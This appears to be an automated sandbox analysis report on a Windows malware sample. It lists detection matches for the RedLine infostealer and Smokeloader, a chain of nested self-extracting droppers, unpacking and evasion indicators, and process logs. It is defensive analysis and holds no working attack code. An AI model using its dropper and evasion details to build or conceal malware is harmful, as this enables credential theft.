Source: 1.3.kino0095.exe.5160220.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000006.00000003.345850863.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.392209330.00000000067B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.370660080.0000000002DA6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000006.00000002.370376252.0000000002C20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.392398994.0000000006A30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Code function: 0_2_00401F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	0_2_00401F90
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Code function: 1_2_00301F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	1_2_00301F90
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Code function: 2_2_00FC1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	2_2_00FC1F90
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Code function: 3_2_00B81F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	3_2_00B81F90

Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Code function: 0_2_00403BA2	0_2_00403BA2
Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Code function: 0_2_00405C9E	0_2_00405C9E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Code function: 1_2_00303BA2	1_2_00303BA2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Code function: 1_2_00305C9E	1_2_00305C9E
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Code function: 2_2_00FC3BA2	2_2_00FC3BA2
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Code function: 2_2_00FC5C9E	2_2_00FC5C9E
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Code function: 3_2_00B83BA2	3_2_00B83BA2
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Code function: 3_2_00B85C9E	3_2_00B85C9E
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_00408C60	6_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_0040DC11	6_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_00407C3F	6_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_00418CCC	6_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_00406CA0	6_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_004028B0	6_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_0041A4BE	6_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_00418244	6_2_00418244
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_00401650	6_2_00401650
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_00402F20	6_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_004193C4	6_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_00418788	6_2_00418788
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_00402F89	6_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_00402B90	6_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_004073A0	6_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_07010DB0	6_2_07010DB0

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe

Code function: String function: 0040E1D8 appears 44 times

Source: kino0095.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 712052 bytes, 2 files, at 0x2c +A "kino2456.exe" +A "en675431.exe", ID 1903, number 1, 28 datablocks, 0x1503 compression
Source: kino2456.exe.1.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 566384 bytes, 2 files, at 0x2c +A "kino0588.exe" +A "dvL76s65.exe", ID 2007, number 1, 24 datablocks, 0x1503 compression
Source: kino0588.exe.2.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 206926 bytes, 2 files, at 0x2c +A "bus9402.exe" +A "con1332.exe", ID 1794, number 1, 11 datablocks, 0x1503 compression

Source: d3HccaLUT7.exe

Binary or memory string: OriginalFilename vs d3HccaLUT7.exe

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe 319B22945BEEB7424FE6DB1E9953AD5F2DC12CBBA2FE24E599C3DEDA678893BB

Source: d3HccaLUT7.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dvL76s65.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: con1332.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: d3HccaLUT7.exe	Virustotal: Detection: 46%
Source: d3HccaLUT7.exe	ReversingLabs: Detection: 41%

Source: d3HccaLUT7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\d3HccaLUT7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\d3HccaLUT7.exe C:\Users\user\Desktop\d3HccaLUT7.exe
Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\
Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Jump to behavior

Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Code function: 0_2_00401F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	0_2_00401F90
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Code function: 1_2_00301F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	1_2_00301F90
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Code function: 2_2_00FC1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	2_2_00FC1F90
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Code function: 3_2_00B81F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	3_2_00B81F90

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\bus9402.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\d3HccaLUT7.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: classification engine

Classification label: mal93.troj.spyw.evad.winEXE@15/10@0/0

Source: C:\Users\user\Desktop\d3HccaLUT7.exe

Code function: 0_2_0040597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

0_2_0040597D

Source: C:\Users\user\Desktop\d3HccaLUT7.exe

0_2_0040597D

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe

Code function: 4_2_00007FF814661B10 ChangeServiceConfigA,

4_2_00007FF814661B10

Source: C:\Users\user\Desktop\d3HccaLUT7.exe

Code function: 0_2_067B07C6 CreateToolhelp32Snapshot,Module32First,

0_2_067B07C6

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\

Source: C:\Users\user\Desktop\d3HccaLUT7.exe

Code function: 0_2_00404FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,

0_2_00404FE0

Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Command line argument: Kernel32.dll	0_2_00402BFB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Command line argument: Kernel32.dll	1_2_00302BFB
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Command line argument: Kernel32.dll	2_2_00FC2BFB
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Command line argument: Kernel32.dll	3_2_00B82BFB
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Command line argument: 08A	6_2_00413780

Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: d3HccaLUT7.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: C:\Users\user\Desktop\d3HccaLUT7.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: d3HccaLUT7.exe

Static file information: File size 1228288 > 1048576

Source: d3HccaLUT7.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x106a00

Source: d3HccaLUT7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: d3HccaLUT7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: d3HccaLUT7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: d3HccaLUT7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: d3HccaLUT7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: d3HccaLUT7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: d3HccaLUT7.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wextract.pdb source: d3HccaLUT7.exe, d3HccaLUT7.exe, 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kino0095.exe, kino0095.exe, 00000001.00000003.308943613.00000000050B2000.00000004.00000020.00020000.00000000.sdmp, kino0095.exe, 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, kino2456.exe, kino2456.exe, 00000002.00000000.309335092.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, kino0588.exe, kino0588.exe, 00000003.00000000.310280030.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, kino0095.exe.0.dr, kino2456.exe.1.dr, kino0588.exe.2.dr
Source:	Binary string: Healer.pdb source: con1332.exe, 00000006.00000002.370856585.0000000004680000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 00000006.00000002.370894086.00000000046E0000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 00000006.00000002.370971517.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, con1332.exe, 00000006.00000003.346171315.0000000002DFF000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 00000006.00000002.371999193.00000000075A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: ge821663.exe.0.dr
Source:	Binary string: wextract.pdbGCTL source: d3HccaLUT7.exe, 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kino0095.exe, 00000001.00000003.308943613.00000000050B2000.00000004.00000020.00020000.00000000.sdmp, kino0095.exe, 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, kino2456.exe, 00000002.00000000.309335092.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, kino0588.exe, 00000003.00000000.310280030.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, kino0095.exe.0.dr, kino2456.exe.1.dr, kino0588.exe.2.dr
Source:	Binary string: <C:\zarepot\talotoyuy1\guf.pdb source: dvL76s65.exe.2.dr
Source:	Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: kino0588.exe, 00000003.00000003.310724099.0000000004C24000.00000004.00000020.00020000.00000000.sdmp, bus9402.exe, 00000004.00000000.310959531.0000000000A82000.00000002.00000001.01000000.00000007.sdmp, bus9402.exe.3.dr
Source:	Binary string: C:\tugiwozexe-hon68\xozutuboreja.pdb source: kino0588.exe, 00000003.00000003.310724099.0000000004C24000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 00000006.00000000.344903620.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, con1332.exe.3.dr
Source:	Binary string: _.pdb source: con1332.exe, 00000006.00000002.370856585.0000000004680000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 00000006.00000002.370894086.00000000046E0000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 00000006.00000002.370971517.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, con1332.exe, 00000006.00000003.346171315.0000000002DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\zarepot\talotoyuy1\guf.pdb source: dvL76s65.exe.2.dr
Source:	Binary string: C:\sigizecem\xigago\tukonunoz_givizadi\yodawusafix\11\j.pdb source: d3HccaLUT7.exe
Source:	Binary string: Healer.pdbH5 source: con1332.exe, 00000006.00000002.370856585.0000000004680000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 00000006.00000002.370894086.00000000046E0000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 00000006.00000002.370971517.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, con1332.exe, 00000006.00000003.346171315.0000000002DFF000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 00000006.00000002.371999193.00000000075A0000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Unpacked PE file: 0.2.d3HccaLUT7.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Unpacked PE file: 6.2.con1332.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Unpacked PE file: 0.2.d3HccaLUT7.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.data:W;.idata:R;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Unpacked PE file: 6.2.con1332.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Code function: 0_2_0040724D push ecx; ret	0_2_00407260
Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Code function: 0_2_067B5623 pushfd ; ret	0_2_067B5624
Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Code function: 0_2_067B1F0B push FFFFFF8Bh; ret	0_2_067B1F0D
Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Code function: 0_2_067B38D3 push cs; ret	0_2_067B38D4
Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Code function: 0_2_067B1E94 pushad ; retf	0_2_067B1E95
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Code function: 1_2_0030724D push ecx; ret	1_2_00307260
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Code function: 2_2_00FC724D push ecx; ret	2_2_00FC7260
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Code function: 3_2_00B8724D push ecx; ret	3_2_00B87260
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_0041C40C push cs; iretd	6_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_00423149 push eax; ret	6_2_00423179
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_0041C50E push cs; iretd	6_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_004231C8 push eax; ret	6_2_00423179
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_0040E21D push ecx; ret	6_2_0040E230
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_0041C6BE push ebx; ret	6_2_0041C6BF
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_07011B4D push ss; iretd	6_2_07011B4F
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_07014139 push edi; iretd	6_2_0701414E
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_0701454E push ecx; retf	6_2_07014554

Source: C:\Users\user\Desktop\d3HccaLUT7.exe

Code function: 0_2_00402F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

0_2_00402F1D

Source: en675431.exe.1.dr

Static PE information: 0xEFAF45DE [Wed Jun 5 03:28:30 2097 UTC]

Source: initial sample	Static PE information: section name: .text entropy: 7.985286241021559
Source: initial sample	Static PE information: section name: .text entropy: 7.842085736950787
Source: initial sample	Static PE information: section name: .text entropy: 7.7554731967823

Source: C:\Users\user\Desktop\d3HccaLUT7.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	File created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	File created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Jump to dropped file
Source: C:\Users\user\Desktop\d3HccaLUT7.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe	Jump to dropped file

Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Code function: 0_2_00401AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,	0_2_00401AE8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Code function: 1_2_00301AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,	1_2_00301AE8
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Code function: 2_2_00FC1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,	2_2_00FC1AE8
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Code function: 3_2_00B81AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,	3_2_00B81AE8

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
